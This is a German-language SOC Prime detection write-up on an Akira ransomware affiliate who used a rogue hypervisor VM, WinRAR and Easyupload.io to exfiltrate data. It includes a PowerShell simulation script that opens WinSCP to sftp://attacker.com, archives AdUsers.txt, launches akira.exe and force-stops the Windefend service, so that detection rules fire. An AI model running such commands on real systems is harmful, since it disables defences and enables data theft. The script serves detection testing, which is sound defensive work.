SOC Prime Bias: Hoch

19 Jun 2026 07:31 UTC

Akira, LimeWire und der bittere Nachgeschmack von Datenexfiltration

Author Photo
SOC Prime Team linkedin icon Folgen
Akira, LimeWire und der bittere Nachgeschmack von Datenexfiltration
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Ein Akira-Ransomware-Affiliate erlangte unbefugten Zugriff auf einen Hypervisor und erstellte eine neue virtuelle Maschine, um diese als verdeckte Zwischenstelle zu nutzen. Der Angreifer verließ sich auf diese isolierte VM, um der Sicherheitsüberwachung zu entgehen, Daten mit WinRAR vorzubereiten und Archive über die Easyupload.io Datei-Sharing-Plattform zu exfiltrieren. Der Fall zeigt, wie Bedrohungsakteure weiterhin legale Upload-Dienste für Datendiebstahl missbrauchen.

Untersuchung

Die Untersuchung kombinierte EDR-Telemetriedaten, Windows-Ereignisprotokolle und den Browserverlauf von Microsoft Edge, um den Einbruch zu rekonstruieren. Analysten stellten zudem ein VHDX-Abbild der betrügerischen virtuellen Maschine wieder her, das aufzeigte, wie der Angreifer Microsoft Defender deaktivierte und den Akira-Ransomware-Betrieb einrichtete. Die forensische Überprüfung der VM enthüllte die genauen Werkzeuge, Websites und Arbeitsabläufe, die während der Staging- und Exfiltrationsphasen verwendet wurden.

Minderung

Organisationen sollten auf das Auftreten neuer oder unautorisierter Endpunkte und virtueller Maschineninstanzen in ihrer Umgebung achten. Starke Sichtbarkeit bei Remote-Zugriffen auf kritische Systeme wie Hypervisoren und Domain-Controller ist essentiell. Es ist auch wichtig, den Zugang zu bekannten Datei-Sharing- und Schnell-Upload-Diensten, die für Exfiltration genutzt werden können, einzuschränken oder genau zu überwachen.

Reaktion

Wenn ein unautorisierter Zugriff auf den Hypervisor festgestellt wird, isolieren Sie sofort den betroffenen Hypervisor und alle neu erstellten virtuellen Maschinen. Führen Sie eine forensische Analyse der VM-Abbilder durch, um das Ausmaß der Datenbereitstellung und -exfiltration zu bestimmen. Überprüfen Sie Zugriffprotokolle, um den ursprünglichen Einstiegspunkt nachzuverfolgen und zu bestätigen, dass kein dauerhafter Angreiferzugriff besteht.

Angriffsablauf

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Vorab-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffs-Erzählung & Befehle: Der Gegner hat initialen Zugriff erlangt und möchte den Einfluss eskalieren. Zuerst listen sie sensible Dateien auf, indem sie nach bekannten Textdateien wie AdUsers.txtsuchen. Zur Vorbereitung der Exfiltration verwenden sie WinRAR.exe um die Daten zu komprimieren. Dann bereiten sie ihr Exfiltrationstool vor, WinSCP.exeund führen schließlich die akira.exe Ransomware-Nutzlast aus. Um zu verhindern, dass der EDR/Antivirus den Prozess beendet, versuchen sie den Windefend Dienst zu stoppen. Diese spezifische Abfolge von Befehlszeilenargumenten und Dienststatusänderungen soll die Akira-spezifische Erkennungslogik auslösen.

  • Regressionstest-Skript:

    # Simulationsskript zur Validierung der Akira-Ransomware-Erkennung
    # HINWEIS: Dieses Skript erfordert Administratorrechte, um den Defender-Dienst zu stoppen.
    
    Write-Host "[+] Start der Akira-Ransomware-Simulation..." -ForegroundColor Cyan
    
    # 1. Ermitteln/Enumerieren simulieren (T1119)
    Write-Host "[+] Schritt 1: Datei-Auflistung über Notepad simulieren..."
    Start-Process notepad.exe -ArgumentList "AdUsers.txt"
    Start-Sleep -Seconds 2
    
    # 2. Datenarchivierung simulieren (T1560.003)
    # Hinweis: Wir gehen davon aus, dass WinRAR vorhanden ist oder wir die Befehlszeilenaktivität simulieren
    Write-Host "[+] Schritt 2: Datenarchivierung mit WinRAR simulieren..."
    Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt"
    Start-Sleep -Seconds 2
    
    # 3. Exfiltrationstool-Vorbereitung simulieren (T1105)
    Write-Host "[+] Schritt 3: Exfiltrationstool-Ausführung simulieren..."
    Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com"
    Start-Sleep -Seconds 2
    
    # 4. Ransomware-Ausführung simulieren (T1204.002)
    Write-Host "[+] Schritt 4: Akira-Nutzlast-Ausführung simulieren..."
    Start-Process "akira.exe"
    Start-Sleep -Seconds 2
    
    # 5. Defender-Deaktivierung simulieren (T1564.006)
    # Dies löst EventID 7036 im Systemprotokoll aus.
    Write-Host "[+] Schritt 5: Versuch, Microsoft Defender zu stoppen..."
    Stop-Service -Name "Windefend" -Force
    
    Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Warnungen." -ForegroundColor Green
  • Bereinigungskommandos:

    # Bereinigungsskript
    Write-Host "[+] Bereinigung der Simulationsartefakte..." -ForegroundColor Cyan
    
    # Neustart des Defender-Dienstes
    Start-Service -Name "Windefend"
    
    # Entfernen Sie simulierte Dateien
    Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue
    
    Write-Host "[+] Bereinigung abgeschlossen." -ForegroundColor Green